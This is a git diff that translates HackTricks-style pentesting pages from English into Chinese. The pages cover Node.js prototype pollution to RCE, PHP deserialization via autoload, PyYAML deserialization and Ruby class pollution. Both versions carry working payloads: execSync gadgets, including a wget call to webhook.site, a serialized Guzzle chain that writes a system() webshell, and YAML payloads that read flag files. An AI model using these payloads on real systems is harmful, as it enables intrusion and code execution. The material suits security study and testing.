+grep --with-filename -nE "^[a-zA-Z].*(exec\(|execFile\(|fork\(|spawn\(|execFileSync\(|execSync\(|spawnSync\()" "$file_path" | grep -v "require(" | grep -v "function " | grep -v "util.deprecate" | sed -E 's/.{255,}.*//'
 done
 # Note that this way of finding child_process executions just importing might not find valid scripts as functions called in the root containing child_process calls won't be found.
 ```
-
 <details>
 
-<summary>Interesting files found by previous script</summary>
+<summary>之前脚本发现的有趣文件</summary>
 
 - node_modules/buffer/bin/**download-node-tests.js**:17:`cp.execSync('rm -rf node/*.js', { cwd: path.join(__dirname, '../test') })`
 - node_modules/buffer/bin/**test.js**:10:`var node = cp.spawn('npm', ['run', 'test-node'], { stdio: 'inherit' })`
@@ -527,27 +497,26 @@ done
 
 </details>
 
-### Setting require file path via prototype pollution
+### 通过原型污染设置 require 文件路径
 
 > [!WARNING]
-> The **previous technique requires** that the **user controls the path of the file** that is going to be **required**. But this is not always true.
+> **之前的技术要求** **用户控制将要被 require 的文件路径**。但这并不总是正确的。
 
-However, if the code is going to execute a require after the prototype pollution, even if you **don't control the path** that is going to be require, you **can force a different one abusing propotype pollution**. So even if the code line is like `require("./a_file.js")` or `require("bytes")` it will **require the package you polluted**.
+然而，如果代码在原型污染后执行 require，即使你 **不控制将要被 require 的路径**，你 **可以通过滥用原型污染强制使用不同的路径**。因此，即使代码行是 `require("./a_file.js")` 或 `require("bytes")`，它将 **require 你污染的包**。
 
-Therefore, if a require is executed after your prototype pollution and no spawn function, this is the attack:
+因此，如果在你的原型污染后执行了 require 并且没有 spawn 函数，这就是攻击：
 
-- Find a **`.js` file inside the system** that when **required** will **execute something using `child_process`**
-  - If you can upload files to the platform you are attacking you might upload a file like that
-- Pollute the paths to **force the require load of the `.js` file** that will execute something with child_process
-- **Pollute the environ/cmdline** to execute arbitrary code when a child_process execution function is called (see the initial techniques)
+- 找到一个 **系统内的 `.js` 文件**，当 **被 require 时** 将 **使用 `child_process` 执行某些操作**
+- 如果你可以向你攻击的平台上传文件，你可以上传这样的文件
+- 污染路径以 **强制 require 加载将使用 child_process 执行某些操作的 `.js` 文件**
+- **污染环境/命令行** 以在调用 child_process 执行函数时执行任意代码（参见初始技术）
 
-#### Absolute require
+#### 绝对 require
 
-If the performed require is **absolute** (`require("bytes")`) and the **package doesn't contain main** in the `package.json` file, you can **pollute the `main` attribute** and make the **require execute a different file**.
+如果执行的 require 是 **绝对的** (`require("bytes")`)，并且 **包在 `package.json` 文件中不包含 main**，你可以 **污染 `main` 属性** 并使 **require 执行不同的文件**。
 
 {{#tabs}}
 {{#tab name="exploit"}}
-
 ```javascript
 // Create a file called malicious.js in /tmp
 // Contents of malicious.js in the other tab
@@ -566,7 +535,7 @@ var proc = require("bytes")
 
 // Abusing the vulnerable code
 USERINPUT = JSON.parse(
-  '{"__proto__": {"main": "/tmp/malicious.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\"child_process\\").execSync(\\"touch /tmp/pp2rce_absolute\\").toString())//"}}'
+'{"__proto__": {"main": "/tmp/malicious.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\"child_process\\").execSync(\\"touch /tmp/pp2rce_absolute\\").toString())//"}}'
 )
 
 clone(USERINPUT)
@@ -574,27 +543,23 @@ clone(USERINPUT)
 var proc = require("bytes")
 // This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec
 ```
-
 {{#endtab}}
 
 {{#tab name="malicious.js"}}
-
 ```javascript
 const { fork } = require("child_process")
 console.log("Hellooo from malicious")
 fork("anything")
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
-#### Relative require - 1
+#### 相对 require - 1
 
-If a **relative path** is loaded instead of an absolute path, you can make node **load a different path**:
+如果加载的是 **相对路径** 而不是绝对路径，您可以使 node **加载不同的路径**：
 
 {{#tabs}}
 {{#tab name="exploit"}}
-
 ```javascript
 // Create a file called malicious.js in /tmp
 // Contents of malicious.js in the other tab
@@ -611,7 +576,7 @@ var proc = require("./relative_path.js")
 
 // Abusing the vulnerable code
 USERINPUT = JSON.parse(
-  '{"__proto__": {"exports": {".": "./malicious.js"}, "1": "/tmp", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\"child_process\\").execSync(\\"touch /tmp/pp2rce_exports_1\\").toString())//"}}'
+'{"__proto__": {"exports": {".": "./malicious.js"}, "1": "/tmp", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\"child_process\\").execSync(\\"touch /tmp/pp2rce_exports_1\\").toString())//"}}'
 )
 
 clone(USERINPUT)
@@ -619,25 +584,21 @@ clone(USERINPUT)
 var proc = require("./relative_path.js")
 // This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec
 ```
-
 {{#endtab}}
 
 {{#tab name="malicious.js"}}
-
 ```javascript
 const { fork } = require("child_process")
 console.log("Hellooo from malicious")
 fork("/path/to/anything")
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
-#### Relative require - 2
+#### 相对 require - 2
 
 {{#tabs}}
 {{#tab name="exploit"}}
-
 ```javascript
 // Create a file called malicious.js in /tmp
 // Contents of malicious.js in the other tab
@@ -656,7 +617,7 @@ var proc = require("./relative_path.js")
 
 // Abusing the vulnerable code
 USERINPUT = JSON.parse(
-  '{"__proto__": {"data": {"exports": {".": "./malicious.js"}}, "path": "/tmp", "name": "./relative_path.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\"child_process\\").execSync(\\"touch /tmp/pp2rce_exports_path\\").toString())//"}}'
+'{"__proto__": {"data": {"exports": {".": "./malicious.js"}}, "path": "/tmp", "name": "./relative_path.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\"child_process\\").execSync(\\"touch /tmp/pp2rce_exports_path\\").toString())//"}}'
 )
 
 clone(USERINPUT)
@@ -664,57 +625,52 @@ clone(USERINPUT)
 var proc = require("./relative_path.js")
 // This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec
 ```
-
 {{#endtab}}
 
 {{#tab name="malicious.js"}}
-
 ```javascript
 const { fork } = require("child_process")
 console.log("Hellooo from malicious")
 fork("/path/to/anything")
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
-#### Relative require - 3
-
-Similar to the previous one, this was found in [**this writeup**](https://blog.huli.tw/2022/12/26/en/ctf-2022-web-js-summary/#balsn-ctf-2022-2linenodejs).
+#### 相对require - 3
 
+与之前的类似，这在[**这篇文章**](https://blog.huli.tw/2022/12/26/en/ctf-2022-web-js-summary/#balsn-ctf-2022-2linenodejs)中发现。
 ```javascript
 // Requiring /opt/yarn-v1.22.19/preinstall.js
 Object.prototype["data"] = {
-  exports: {
-    ".": "./preinstall.js",
-  },
-  name: "./usage",
+exports: {
+".": "./preinstall.js",
+},
+name: "./usage",
 }
 Object.prototype["path"] = "/opt/yarn-v1.22.19"
 Object.prototype.shell = "node"
 Object.prototype["npm_config_global"] = 1
 Object.prototype.env = {
-  NODE_DEBUG:
-    "console.log(require('child_process').execSync('wget${IFS}https://webhook.site?q=2').toString());process.exit()//",
-  NODE_OPTIONS: "--require=/proc/self/environ",
+NODE_DEBUG:
+"console.log(require('child_process').execSync('wget${IFS}https://webhook.site?q=2').toString());process.exit()//",
+NODE_OPTIONS: "--require=/proc/self/environ",
 }
 
 require("./usage.js")
 ```
-
 ## VM Gadgets
 
-In the paper [https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf) is also indicated that the control of **`contextExtensions`** from some methods of the **`vm`** library could be used as a gadget.\
-However, as the previous **`child_process`** methods, it has been **fixed** in the latest versions.
+在论文 [https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf) 中也指出，**`vm`** 库某些方法的 **`contextExtensions`** 控制可以作为一个 gadget。\
+然而，与之前的 **`child_process`** 方法一样，它在最新版本中已被 **修复**。
 
 ## Fixes & Unexpected protections
 
-Please, note that prototype pollution works if the **attribute** of an object that is being accessed is **undefined**. If in the **code** that **attribute** is **set** a **value** you **won't be able to overwrite it**.
+请注意，原型污染在访问的对象的 **attribute** 为 **undefined** 时有效。如果在 **code** 中该 **attribute** 被 **设置** 为一个 **value**，你 **将无法覆盖它**。
 
-In Jun 2022 from [**this commit**](https://github.com/nodejs/node/commit/20b0df1d1eba957ea30ba618528debbe02a97c6a) the var `options` instead of a `{}` is a **`kEmptyObject`**. Which **prevents a prototype pollution** from affecting the **attributes** of **`options`** to obtain RCE.\
-At least from v18.4.0 this protection has been **implemented,** and therefore the `spawn` and `spawnSync` **exploits** affecting the methods **no longer work** (if no `options` are used!).
+在 2022 年 6 月，从 [**this commit**](https://github.com/nodejs/node/commit/20b0df1d1eba957ea30ba618528debbe02a97c6a) 开始，变量 `options` 不再是 `{}`，而是 **`kEmptyObject`**。这 **防止了原型污染** 影响 **`options`** 的 **attributes** 以获得 RCE。\
+至少从 v18.4.0 开始，这种保护已被 **实施**，因此 `spawn` 和 `spawnSync` 的 **exploits** 不再影响这些方法（如果不使用 `options`！）。
 
-In [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156cadc1b3492eac3941dd9) the **prototype pollution** of **`contextExtensions`** from the vm library was **also kind of fixed** setting options to **`kEmptyObject`** instead of **`{}`.**
+在 [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156cadc1b3492eac3941dd9) 中，vm 库的 **`contextExtensions`** 的 **prototype pollution** 也通过将选项设置为 **`kEmptyObject`** 而 **部分修复**，而不是 **`{}`**。
 
 ### **Other Gadgets**
 
diff --git a/src/pentesting-web/deserialization/php-deserialization-+-autoload-classes.md b/src/pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
index 48fd6ad1a..103aee7ca 100644
--- a/src/pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
+++ b/src/pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
@@ -1,71 +1,64 @@
-# PHP - Deserialization + Autoload Classes
+# PHP - 反序列化 + 自动加载类
 
 {{#include ../../banners/hacktricks-training.md}}
 
-First, you should check what are [**Autoloading Classes**](https://www.php.net/manual/en/language.oop5.autoload.php).
+首先，您应该检查什么是 [**自动加载类**](https://www.php.net/manual/en/language.oop5.autoload.php)。
 
-## PHP deserialization + spl_autoload_register + LFI/Gadget
+## PHP 反序列化 + spl_autoload_register + LFI/Gadget
 
-We are in a situation where we found a **PHP deserialization in a webapp** with **no** library vulnerable to gadgets inside **`phpggc`**. However, in the same container there was a **different composer webapp with vulnerable libraries**. Therefore, the goal was to **load the composer loader of the other webapp** and abuse it to **load a gadget that will exploit that library with a gadget** from the webapp vulnerable to deserialization.
+我们处于一种情况，发现了一个 **webapp 中的 PHP 反序列化**，并且 **没有** 在 **`phpggc`** 中的库易受攻击的 gadget。然而，在同一个容器中有一个 **不同的 composer webapp，里面有易受攻击的库**。因此，目标是 **加载另一个 webapp 的 composer 加载器** 并利用它 **加载一个 gadget 来利用该库中的 gadget**，该库易受反序列化攻击。
 
-Steps:
-
-- You have found a **deserialization** and there **isn’t any gadget** in the current app code
-- You can abuse a **`spl_autoload_register`** function like the following to **load any local file with `.php` extension**
-  - For that you use a deserialization where the name of the class is going to be inside **`$name`**. You **cannot use "/" or "."** in a class name in a serialized object, but the **code** is **replacing** the **underscores** ("\_") **for slashes** ("/"). So a class name such as `tmp_passwd` will be transformed into `/tmp/passwd.php` and the code will try to load it.\
-    A **gadget example** will be: **`O:10:"tmp_passwd":0:{}`**
+步骤：
 
+- 您发现了一个 **反序列化**，并且 **当前应用代码中没有任何 gadget**
+- 您可以利用 **`spl_autoload_register`** 函数，如下所示，以 **加载任何本地文件，扩展名为 `.php`**
+- 为此，您使用一个反序列化，其中类的名称将位于 **`$name`** 中。您 **不能在序列化对象的类名中使用 "/" 或 "."**，但是 **代码** 正在 **将** **下划线** ("\_") **替换为斜杠** ("/")。因此，像 `tmp_passwd` 这样的类名将被转换为 `/tmp/passwd.php`，代码将尝试加载它。\
+一个 **gadget 示例** 将是： **`O:10:"tmp_passwd":0:{}`**
 ```php
 spl_autoload_register(function ($name) {
 
-   if (preg_match('/Controller$/', $name)) {
-       $name = "controllers/${name}";
-   } elseif (preg_match('/Model$/', $name)) {
-       $name = "models/${name}";
-   } elseif (preg_match('/_/', $name)) {
-       $name = preg_replace('/_/', '/', $name);
-   }
+if (preg_match('/Controller$/', $name)) {
+$name = "controllers/${name}";
+} elseif (preg_match('/Model$/', $name)) {
+$name = "models/${name}";
+} elseif (preg_match('/_/', $name)) {
+$name = preg_replace('/_/', '/', $name);
+}
 
-   $filename = "/${name}.php";
+$filename = "/${name}.php";
 
-   if (file_exists($filename)) {
-       require $filename;
-   }
-   elseif (file_exists(__DIR__ . $filename)) {
-       require __DIR__ . $filename;
-   }
+if (file_exists($filename)) {
+require $filename;
+}
+elseif (file_exists(__DIR__ . $filename)) {
+require __DIR__ . $filename;
+}
 });
 ```
-
 > [!TIP]
-> If you have a **file upload** and can upload a file with **`.php` extension** you could **abuse this functionality directly** and get already RCE.
+> 如果你有一个 **文件上传** 并且可以上传一个 **`.php` 扩展名** 的文件，你可以 **直接利用这个功能** 并获得 RCE。
 
-In my case, I didn’t have anything like that, but there was inside the **same container** another composer web page with a **library vulnerable to a `phpggc` gadget**.
-
-- To load this other library, first you need to **load the composer loader of that other web app** (because the one of the current application won’t access the libraries of the other one.) **Knowing the path of the application**, you can achieve this very easily with: **`O:28:"www_frontend_vendor_autoload":0:{}`** (In my case, the composer loader was in `/www/frontend/vendor/autoload.php`)
-- Now, you can **load** the others **app composer loader**, so it’s time to **`generate the phpgcc`** **payload** to use. In my case, I used **`Guzzle/FW1`**, which allowed me to **write any file inside the filesystem**.
-  - NOTE: The **generated gadget was not working**, in order for it to work I **modified** that payload **`chain.php`** of phpggc and set **all the attribute**s of the classes **from private to public**. If not, after deserializing the string, the attributes of the created objects didn’t have any values.
-- Now we have the way to **load the others app composer loader** and have a **phpggc payload that works**, but we need to **do this in the SAME REQUEST for the loader to be loaded when the gadget is used**. For that, I sent a serialized array with both objects like:
-  - You can see **first the loader being loaded and then the payload**
+在我的情况下，我没有这样的东西，但在 **同一个容器** 内有另一个 composer 网页，里面有一个 **易受攻击的 `phpggc` 小工具**。
 
+- 要加载这个其他库，首先你需要 **加载那个其他 web 应用的 composer 加载器**（因为当前应用的加载器无法访问另一个的库）。**知道应用的路径**，你可以很容易地实现这一点：**`O:28:"www_frontend_vendor_autoload":0:{}`**（在我的情况下，composer 加载器在 `/www/frontend/vendor/autoload.php`）
+- 现在，你可以 **加载** 其他 **应用的 composer 加载器**，所以是时候 **`生成 phpgcc`** **有效载荷** 来使用。在我的情况下，我使用了 **`Guzzle/FW1`**，这让我可以 **在文件系统内写入任何文件**。
+- 注意：**生成的小工具没有工作**，为了让它工作，我 **修改** 了那个有效载荷 **`chain.php`** 的 phpggc，并将 **所有属性** 的类 **从私有改为公共**。如果不这样做，反序列化字符串后，创建的对象的属性将没有任何值。
+- 现在我们有了 **加载其他应用的 composer 加载器** 的方法，并且有一个 **有效的 phpggc 有效载荷**，但我们需要 **在同一个请求中执行此操作，以便在使用小工具时加载加载器**。为此，我发送了一个序列化数组，包含两个对象，如下所示：
+- 你可以看到 **首先加载加载器，然后是有效载荷**。
 ```php
 a:2:{s:5:"Extra";O:28:"www_frontend_vendor_autoload":0:{}s:6:"Extra2";O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{s:7:"cookies";a:1:{i:0;O:27:"GuzzleHttp\Cookie\SetCookie":1:{s:4:"data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:56:"<?php system('echo L3JlYWRmbGFn | base64 -d | bash'); ?>";}}}s:10:"strictMode";N;s:8:"filename";s:10:"/tmp/a.php";s:19:"storeSessionCookies";b:1;}}
 ```
-
-- Now, we can **create and write a file**, however, the user **couldn’t write in any folder inside the web server**. So, as you can see in the payload, PHP calling **`system`** with some **base64** is created in **`/tmp/a.php`**. Then, we can **reuse the first type of payload** that we used to as LFI to load the composer loader of the other webapp t**o load the generated `/tmp/a.php`** file. Just add it to the deserialization gadget:&#x20;
-
+- 现在，我们可以**创建和写入文件**，但是用户**无法在web服务器的任何文件夹中写入**。因此，如您在有效负载中所见，PHP调用**`system`**并创建了一些**base64**在**`/tmp/a.php`**中。然后，我们可以**重用我们用于LFI的第一种有效负载**来加载另一个web应用程序的composer加载器**以加载生成的`/tmp/a.php`**文件。只需将其添加到反序列化小工具中：&#x20;
 ```php
 a:3:{s:5:"Extra";O:28:"www_frontend_vendor_autoload":0:{}s:6:"Extra2";O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{s:7:"cookies";a:1:{i:0;O:27:"GuzzleHttp\Cookie\SetCookie":1:{s:4:"data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:56:"<?php system('echo L3JlYWRmbGFn | base64 -d | bash'); ?>";}}}s:10:"strictMode";N;s:8:"filename";s:10:"/tmp/a.php";s:19:"storeSessionCookies";b:1;}s:6:"Extra3";O:5:"tmp_a":0:{}}
 ```
+**有效载荷摘要**
 
-**Summary of the payload**
+- **加载同一容器中另一个webapp的composer自动加载**
+- **加载phpggc小工具**以滥用另一个webapp的库（最初易受反序列化攻击的webapp的库中没有任何小工具）
+- 该小工具将**在/tmp/a.php中创建一个包含PHP有效载荷**的文件，文件中包含恶意命令（webapp用户无法在任何webapp的任何文件夹中写入）
+- 我们有效载荷的最后部分将使用**加载生成的php文件**来执行命令
 
-- **Load the composer autoload** of a different webapp in the same container
-- **Load a phpggc gadget** to abuse a library from the other webapp (the initial webapp vulnerable to deserialization didn’t have any gadget on its libraries)
-- The gadget will **create a file with a PHP payload** on it in /tmp/a.php with malicious commands (the webapp user cannot write in any folder of any webapp)
-- The final part of our payload will use **load the generated php file** that will execute commands
-
-I needed to **call this deserialization twice**. In my testing, the first time the `/tmp/a.php` file was created but not loaded, and the second time it was correctly loaded.
+我需要**调用这个反序列化两次**。在我的测试中，第一次创建了`/tmp/a.php`文件但未加载，第二次则正确加载。 
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/deserialization/python-yaml-deserialization.md b/src/pentesting-web/deserialization/python-yaml-deserialization.md
index 9d10d705f..5d5f1c59e 100644
--- a/src/pentesting-web/deserialization/python-yaml-deserialization.md
+++ b/src/pentesting-web/deserialization/python-yaml-deserialization.md
@@ -1,11 +1,10 @@
-# Python Yaml Deserialization
+# Python Yaml 反序列化
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Yaml **Deserialization**
-
-**Yaml** python libraries is also capable to **serialize python objects** and not just raw data:
+## Yaml **反序列化**
 
+**Yaml** python 库也能够 **序列化 python 对象** 而不仅仅是原始数据：
 ```
 print(yaml.dump(str("lol")))
 lol
@@ -23,13 +22,11 @@ print(yaml.dump(range(1,10)))
 - 10
 - 1
 ```
-
-Check how the **tuple** isn’t a raw type of data and therefore it was **serialized**. And the same happened with the **range** (taken from the builtins).
+检查一下 **tuple** 不是原始数据类型，因此它被 **序列化** 了。 **range** 也是如此（取自内置函数）。
 
 ![](<../../images/image (1040).png>)
 
-**safe_load()** or **safe_load_all()** uses SafeLoader and **don’t support class object deserialization**. Class object deserialization example:
-
+**safe_load()** 或 **safe_load_all()** 使用 SafeLoader，并且 **不支持类对象反序列化**。 类对象反序列化示例：
 ```python
 import yaml
 from yaml import UnsafeLoader, FullLoader, Loader
@@ -48,13 +45,11 @@ print(yaml.unsafe_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
 #The other ways to load data will through an error as they won't even attempt to
 #deserialize the python object
 ```
+之前的代码使用 **unsafe_load** 来加载序列化的 python 类。这是因为在 **version >= 5.1** 中，它不允许 **反序列化任何序列化的 python 类或类属性**，如果在 load() 中未指定 Loader 或 Loader=SafeLoader。
 
-The previous code used **unsafe_load** to load the serialized python class. This is because in **version >= 5.1**, it doesn’t allow to **deserialize any serialized python class or class attribute**, with Loader not specified in load() or Loader=SafeLoader.
-
-### Basic Exploit
-
-Example on how to **execute a sleep**:
+### 基本利用
 
+如何 **执行一个 sleep** 的示例：
 ```python
 import yaml
 from yaml import UnsafeLoader, FullLoader, Loader
@@ -69,48 +64,42 @@ print(yaml.unsafe_load(data)) #Executed
 print(yaml.full_load_all(data))
 print(yaml.unsafe_load_all(data))
 ```
+### 漏洞 .load("\<content>") 没有 Loader
 
-### Vulnerable .load("\<content>") without Loader
-
-**Old versions** of pyyaml were vulnerable to deserialisations attacks if you **didn't specify the Loader** when loading something: `yaml.load(data)`
-
-You can find the [**description of the vulnerability here**](https://hackmd.io/@defund/HJZajCVlP)**.** The proposed **exploit** in that page is:
+**旧版本**的 pyyaml 在加载内容时如果**没有指定 Loader**，则容易受到反序列化攻击：`yaml.load(data)`
 
+您可以在[**此处找到漏洞的描述**](https://hackmd.io/@defund/HJZajCVlP)**.** 页面中提出的**利用**是：
 ```yaml
 !!python/object/new:str
 state: !!python/tuple
-  - 'print(getattr(open("flag\x2etxt"), "read")())'
-  - !!python/object/new:Warning
-    state:
-      update: !!python/name:exec
+- 'print(getattr(open("flag\x2etxt"), "read")())'
+- !!python/object/new:Warning
+state:
+update: !!python/name:exec
 ```
-
-Or you could also use this **one-liner provided by @ishaack**:
-
+或者你也可以使用这个**@ishaack 提供的一行代码**：
 ```yaml
 !!python/object/new:str {
-  state:
-    !!python/tuple [
-      'print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))',
-      !!python/object/new:Warning { state: { update: !!python/name:exec  } },
-    ],
+state:
+!!python/tuple [
+'print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))',
+!!python/object/new:Warning { state: { update: !!python/name:exec  } },
+],
 }
 ```
-
-Note that in **recent versions** you cannot **no longer call `.load()`** **without a `Loader`** and the **`FullLoader`** is **no longer vulnerable** to this attack.
+请注意，在**最近的版本**中，您不能**再调用 `.load()`** **而不使用 `Loader`**，并且**`FullLoader`** **不再易受此攻击**。
 
 ## RCE
 
-Custom payloads can be created using Python YAML modules such as **PyYAML** or **ruamel.yaml**. These payloads can exploit vulnerabilities in systems that deserialize untrusted input without proper sanitization.
-
+可以使用 Python YAML 模块，如 **PyYAML** 或 **ruamel.yaml**，创建自定义有效负载。这些有效负载可以利用在没有适当清理的情况下反序列化不受信任输入的系统中的漏洞。
 ```python
 import yaml
 from yaml import UnsafeLoader, FullLoader, Loader
 import subprocess
 
 class Payload(object):
-    def __reduce__(self):
-        return (subprocess.Popen,('ls',))
+def __reduce__(self):
+return (subprocess.Popen,('ls',))
 
 deserialized_data = yaml.dump(Payload()) # serializing data
 print(deserialized_data)
@@ -122,11 +111,9 @@ print(yaml.load(deserialized_data, Loader=UnsafeLoader))
 print(yaml.load(deserialized_data, Loader=Loader))
 print(yaml.unsafe_load(deserialized_data))
 ```
+### 创建有效负载的工具
 
-### Tool to create Payloads
-
-The tool [https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) can be used to generate python deserialization payloads to abuse **Pickle, PyYAML, jsonpickle and ruamel.yaml:**
-
+该工具 [https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) 可用于生成 python 反序列化有效负载，以滥用 **Pickle, PyYAML, jsonpickle 和 ruamel.yaml:**
 ```bash
 python3 peas.py
 Enter RCE command :cat /root/flag.txt
@@ -145,14 +132,12 @@ gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSF
 cat /tmp/example_yaml
 !!python/object/apply:subprocess.Popen
 - !!python/tuple
-  - cat
-    - /root/flag.txt
+- cat
+- /root/flag.txt
 ```
-
-### References
+### 参考文献
 
 - [https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)
 - [https://net-square.com/yaml-deserialization-attack-in-python.html](https://net-square.com/yaml-deserialization-attack-in-python.html)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/deserialization/ruby-class-pollution.md b/src/pentesting-web/deserialization/ruby-class-pollution.md
index 221ecb5a5..f211f4be0 100644
--- a/src/pentesting-web/deserialization/ruby-class-pollution.md
+++ b/src/pentesting-web/deserialization/ruby-class-pollution.md
@@ -2,12 +2,11 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-This is a summary from the post [https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html](https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html)
+这是来自帖子 [https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html](https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html) 的摘要
 
 ## Merge on Attributes
 
-Example:
-
+示例：
 ```ruby
 # Code from https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html
 # Comments added to exploit the merge on attributes
@@ -17,167 +16,163 @@ require 'json'
 # Base class for both Admin and Regular users
 class Person
 
-  attr_accessor :name, :age, :details
+attr_accessor :name, :age, :details
 
-  def initialize(name:, age:, details:)
-    @name = name
-    @age = age
-    @details = details
-  end
+def initialize(name:, age:, details:)
+@name = name
+@age = age
+@details = details
+end
 
-  # Method to merge additional data into the object
-  def merge_with(additional)
-    recursive_merge(self, additional)
-  end
+# Method to merge additional data into the object
+def merge_with(additional)
+recursive_merge(self, additional)
+end
 
-  # Authorize based on the `to_s` method result
-  def authorize
-    if to_s == "Admin"
-      puts "Access granted: #{@name} is an admin."
-    else
-      puts "Access denied: #{@name} is not an admin."
-    end
-  end
+# Authorize based on the `to_s` method result
+def authorize
+if to_s == "Admin"
+puts "Access granted: #{@name} is an admin."
+else
+puts "Access denied: #{@name} is not an admin."
+end
+end
 
-  # Health check that executes all protected methods using `instance_eval`
-  def health_check
-    protected_methods().each do |method|
-      instance_eval(method.to_s)
-    end
-  end
+# Health check that executes all protected methods using `instance_eval`
+def health_check
+protected_methods().each do |method|
+instance_eval(method.to_s)
+end
+end
 
-  private
+private
 
-  # VULNERABLE FUNCTION that can be abused to merge attributes
-  def recursive_merge(original, additional, current_obj = original)
-    additional.each do |key, value|
+# VULNERABLE FUNCTION that can be abused to merge attributes
+def recursive_merge(original, additional, current_obj = original)
+additional.each do |key, value|
 
-      if value.is_a?(Hash)
-        if current_obj.respond_to?(key)
-          next_obj = current_obj.public_send(key)
-          recursive_merge(original, value, next_obj)
-        else
-          new_object = Object.new
-          current_obj.instance_variable_set("@#{key}", new_object)
-          current_obj.singleton_class.attr_accessor key
-        end
-      else
-        current_obj.instance_variable_set("@#{key}", value)
-        current_obj.singleton_class.attr_accessor key
-      end
-    end
-    original
-  end
+if value.is_a?(Hash)
+if current_obj.respond_to?(key)
+next_obj = current_obj.public_send(key)
+recursive_merge(original, value, next_obj)
+else
+new_object = Object.new
+current_obj.instance_variable_set("@#{key}", new_object)
+current_obj.singleton_class.attr_accessor key
+end
+else
+current_obj.instance_variable_set("@#{key}", value)
+current_obj.singleton_class.attr_accessor key
+end
+end
+original
+end
 
-  protected
+protected
 
-  def check_cpu
-    puts "CPU check passed."
-  end
+def check_cpu
+puts "CPU check passed."
+end
 
-  def check_memory
-    puts "Memory check passed."
-  end
+def check_memory
+puts "Memory check passed."
+end
 end
 
 # Admin class inherits from Person
 class Admin < Person
-  def initialize(name:, age:, details:)
-    super(name: name, age: age, details: details)
-  end
+def initialize(name:, age:, details:)
+super(name: name, age: age, details: details)
+end
 
-  def to_s
-    "Admin"
-  end
+def to_s
+"Admin"
+end
 end
 
 # Regular user class inherits from Person
 class User < Person
-  def initialize(name:, age:, details:)
-    super(name: name, age: age, details: details)
-  end
+def initialize(name:, age:, details:)
+super(name: name, age: age, details: details)
+end
 
-  def to_s
-    "User"
-  end
+def to_s
+"User"
+end
 end
 
 class JSONMergerApp
-  def self.run(json_input)
-    additional_object = JSON.parse(json_input)
+def self.run(json_input)
+additional_object = JSON.parse(json_input)
 
-    # Instantiate a regular user
-    user = User.new(
-      name: "John Doe",
-      age: 30,
-      details: {
-        "occupation" => "Engineer",
-        "location" => {
-          "city" => "Madrid",
-          "country" => "Spain"
-        }
-      }
-    )
+# Instantiate a regular user
+user = User.new(
+name: "John Doe",
+age: 30,
+details: {
+"occupation" => "Engineer",
+"location" => {
+"city" => "Madrid",
+"country" => "Spain"
+}
+}
+)
 
 
-    # Perform a recursive merge, which could override methods
-    user.merge_with(additional_object)
+# Perform a recursive merge, which could override methods
+user.merge_with(additional_object)
 
-    # Authorize the user (privilege escalation vulnerability)
-    # ruby class_pollution.rb '{"to_s":"Admin","name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
-    user.authorize
+# Authorize the user (privilege escalation vulnerability)
+# ruby class_pollution.rb '{"to_s":"Admin","name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
+user.authorize
 
-    # Execute health check (RCE vulnerability)
-    # ruby class_pollution.rb '{"protected_methods":["puts 1"],"name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
-    user.health_check
+# Execute health check (RCE vulnerability)
+# ruby class_pollution.rb '{"protected_methods":["puts 1"],"name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
+user.health_check
 
-  end
+end
 end
 
 if ARGV.length != 1
-  puts "Usage: ruby class_pollution.rb 'JSON_STRING'"
-  exit
+puts "Usage: ruby class_pollution.rb 'JSON_STRING'"
+exit
 end
 
 json_input = ARGV[0]
 JSONMergerApp.run(json_input)
 ```
+### 解释
 
-### Explanation
